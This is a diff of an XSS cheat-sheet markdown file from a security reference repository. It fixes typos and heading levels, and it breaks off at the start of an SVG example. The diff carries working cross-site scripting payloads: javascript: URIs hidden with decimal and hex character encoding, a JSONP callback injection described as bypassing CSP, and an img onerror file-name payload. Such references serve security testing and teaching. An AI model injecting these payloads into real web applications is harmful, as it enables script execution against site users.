Angus-C-git/SecSheets/Web/Injection/XSS/XSS.md

 <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
 ```

-### HTML Hexidecimal Character Refrences
+#### HTML Hexadecimal Character References

 ```
 <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 ```

-## JSONP Payloads
+### JSONP Payloads

-+ JSONP callbacks can be weaponised in certain cercimstances to get XSS
++ JSONP callbacks can be weaponised in certain circumstances to get XSS
-+ JSONP based XSS vectors also have a high chance of negating CSP protections making them an exeptionally useful vulnerability
++ JSONP based XSS vectors also have a high chance of negating CSP protections making them an exceptionally useful vulnerability
-+ Note: the following payloads are designed to be injected into anypart of a web application which uses a JSONP endpoint, they can
++ Note: the following payloads are designed to be injected into any part of a web application which uses a JSONP endpoint, they can
  also be injected into the callback of a legitimate JSONP query
 	+ For example: `domain.com/page?query=PAYLOAD`

-### Basic JSONP Payloads
+#### Basic JSONP Payloads

 `<script src="https://current.domain.com/jsonp_endpoint.jsonp?callback=alert(1);"></script>`

-## Image/File Upload Based Payloads
+### Image/File Upload Based Payloads

-### File Name
+#### File Name

 `""><img src=x onerror=alert(1)>.gif`

-### SVG
+#### SVG

 ```
 <?xml version="1.0" standalone="no"?>